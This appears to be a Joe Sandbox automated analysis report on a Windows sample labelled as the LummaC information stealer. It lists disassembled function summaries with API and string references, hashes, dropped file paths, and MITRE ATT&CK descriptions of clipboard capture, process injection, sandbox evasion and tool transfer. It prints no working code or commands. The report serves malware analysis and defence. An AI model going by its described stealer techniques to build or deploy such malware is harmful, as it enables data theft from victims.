Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: dcdcb6fdbadf52c2eb60d093886a33860c87d8bc4eaf0a297f60c2089dc0ef57
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: DE81E52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042E9F6
VariantInit.OLEAUT32 ref: 0042EA05

Strings

T, xrefs: 0042EA24
-, xrefs: 0042EA94
Q, xrefs: 0042EA2C
<, xrefs: 0042EA50
,, xrefs: 0042EA90
*, xrefs: 0042EA88
(, xrefs: 0042EA80
b, xrefs: 0042EA3C
>, xrefs: 0042EA58
2, xrefs: 0042EA68
W, xrefs: 0042EA34
:, xrefs: 0042EA48
8, xrefs: 0042EA40
4, xrefs: 0042EA70
6, xrefs: 0042EA78
., xrefs: 0042EA98
0, xrefs: 0042EA60

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6

Function 0091EC54 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0091EC5D
VariantInit.OLEAUT32 ref: 0091EC6C

Strings

b, xrefs: 0091ECA3
2, xrefs: 0091ECCF
6, xrefs: 0091ECDF
0, xrefs: 0091ECC7
*, xrefs: 0091ECEF
., xrefs: 0091ECFF
4, xrefs: 0091ECD7
:, xrefs: 0091ECAF
(, xrefs: 0091ECE7
8, xrefs: 0091ECA7
-, xrefs: 0091ECFB
W, xrefs: 0091EC9B
>, xrefs: 0091ECBF
,, xrefs: 0091ECF7
T, xrefs: 0091EC8B
<, xrefs: 0091ECB7
Q, xrefs: 0091EC93

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: b340e2a2f8edf2a67fa6646026b6c78e104d5219cc54fd716d757a1bee5ea387
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: DA412821108BC1CED726CF388488646BFA16F66224F0886CDD8E54F3DBC774D51ACBA2

Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F83F
VariantInit.OLEAUT32 ref: 0042F84E

Strings

-, xrefs: 0042F8E3
., xrefs: 0042F8E7
T, xrefs: 0042F873
(, xrefs: 0042F8CF
<, xrefs: 0042F89F
0, xrefs: 0042F8AF
:, xrefs: 0042F897
>, xrefs: 0042F8A7
,, xrefs: 0042F8DF
8, xrefs: 0042F88F
4, xrefs: 0042F8BF
b, xrefs: 0042F88B
*, xrefs: 0042F8D7
W, xrefs: 0042F883
6, xrefs: 0042F8C7
2, xrefs: 0042F8B7
Q, xrefs: 0042F87B

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66

Function 0091FA9A Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0091FAA6
VariantInit.OLEAUT32 ref: 0091FAB5

Strings

4, xrefs: 0091FB26
:, xrefs: 0091FAFE
T, xrefs: 0091FADA
<, xrefs: 0091FB06
>, xrefs: 0091FB0E
0, xrefs: 0091FB16
W, xrefs: 0091FAEA
2, xrefs: 0091FB1E
Q, xrefs: 0091FAE2
,, xrefs: 0091FB46
8, xrefs: 0091FAF6
., xrefs: 0091FB4E
(, xrefs: 0091FB36
*, xrefs: 0091FB3E
-, xrefs: 0091FB4A
6, xrefs: 0091FB2E
b, xrefs: 0091FAF2

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 27da4d4f2e0857f795ca55c2f6c63f14677c209f99f516d6f5afae9fcc40012e
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 6A410820108BC1CED726CF3C8498616BFA16B66224F088ADDD8E94F3DBC375D519CB66

Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043244F

Strings

[, xrefs: 004324DB
[, xrefs: 004324C7
H, xrefs: 004324D1
Q, xrefs: 0043249F
L, xrefs: 004324BD
@, xrefs: 004324A9
X, xrefs: 00432477
X, xrefs: 0043246D
A, xrefs: 004324EA
e, xrefs: 004324B3
@, xrefs: 004324E5
C, xrefs: 00432481
J, xrefs: 0043248B
E, xrefs: 00432495

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757

Function 00922670 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 009226B6

Strings

X, xrefs: 009226D4
@, xrefs: 00922710
X, xrefs: 009226DE
e, xrefs: 0092271A
@, xrefs: 0092274C
A, xrefs: 00922751
[, xrefs: 0092272E
[, xrefs: 00922742
L, xrefs: 00922724
Q, xrefs: 00922706
E, xrefs: 009226FC
H, xrefs: 00922738
J, xrefs: 009226F2
C, xrefs: 009226E8

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
Instruction ID: 3aed930ce846a896c0b37901505aa134009d07992dcfcf8aad44ff4c99caa693
Opcode Fuzzy Hash: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
Instruction Fuzzy Hash: C441097010C7C18AD365DB38849879FBFE1AB96314F885A9CE6E94B3E2C7798405CB53

Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004321C6

Strings

@, xrefs: 00432263
C, xrefs: 004321FF
A, xrefs: 00432268
L, xrefs: 0043223B
X, xrefs: 004321EB
J, xrefs: 00432209
@, xrefs: 00432227
e, xrefs: 00432231
X, xrefs: 004321F5
[, xrefs: 00432245
[, xrefs: 00432259
H, xrefs: 0043224F
Q, xrefs: 0043221D
E, xrefs: 00432213

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757

Function 009223FB Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0092242D

Strings

@, xrefs: 0092248E
[, xrefs: 009224C0
X, xrefs: 00922452
L, xrefs: 009224A2
H, xrefs: 009224B6
X, xrefs: 0092245C
E, xrefs: 0092247A
A, xrefs: 009224CF
@, xrefs: 009224CA
Q, xrefs: 00922484
e, xrefs: 00922498
C, xrefs: 00922466
[, xrefs: 009224AC
J, xrefs: 00922470

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
Instruction ID: 14880d3d22ecbdf49e3ec4b1af1dcf9736988302cf26e4274e49aa9f51c59d2b
Opcode Fuzzy Hash: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
Instruction Fuzzy Hash: EF41F87000D7C19AD3659B28849874FBFE06BA7314F885A9DF6E84B3E2C7798449C753

Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431EE7
VariantInit.OLEAUT32 ref: 00431EFA

Strings

z, xrefs: 00431F6F
z, xrefs: 00431F2F
n, xrefs: 00431FAF
p, xrefs: 00431FBF
p, xrefs: 00431F9F
w, xrefs: 00431F4F
v, xrefs: 00431F3F
e, xrefs: 00431F5F
e, xrefs: 00431F1F
A, xrefs: 00431F8F

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763

Function 00922144 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0092214E
VariantInit.OLEAUT32 ref: 00922161

Strings

p, xrefs: 00922206
z, xrefs: 009221D6
e, xrefs: 00922186
A, xrefs: 009221F6
e, xrefs: 009221C6
w, xrefs: 009221B6
n, xrefs: 00922216
p, xrefs: 00922226
v, xrefs: 009221A6
z, xrefs: 00922196

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 631ac13dcf4ad67b84fa954b3fb8c8aa9b69c029e9ac3ab01cfb60ba486fb27f
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: DE41383160C7C18ED331CB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763

Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004329E2
GetClipboardData.USER32 ref: 00432A05
GlobalLock.KERNEL32 ref: 00432A22
GlobalUnlock.KERNEL32 ref: 00432B6B
CloseClipboard.USER32 ref: 00432B73

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797

Function 00922C27 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00922C49
GetClipboardData.USER32 ref: 00922C6C
GlobalLock.KERNEL32 ref: 00922C89
GlobalUnlock.KERNEL32 ref: 00922DD2
CloseClipboard.USER32 ref: 00922DDA

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
Instruction ID: f2b64a6ac73f892625205d27768cc127f4ca41937930f88f48c2f09ecf4ab4af
Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
Instruction Fuzzy Hash: DF5124F1D086929FD700AB78D4493AEFFE0AB41310F048A38D99987385D3799894C793

Function 0040B390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
FreeLibrary.KERNEL32 ref: 0040B3B7

Strings

v, xrefs: 0040B396, 0040B3B7

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: FreeLibrary
String ID: v
API String ID: 3664257935-2904040280
Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sqJIHyPqhr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_E093.tmp.exe_52b86cb6b71e77963fa34545984c262daa49c7b_5c90122f_478904bf-6054-4d9f-ac81-d6d9eff5e814\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1AF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2B9.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2DA.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\E093.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
sqJIHyPqhr.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 024A003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

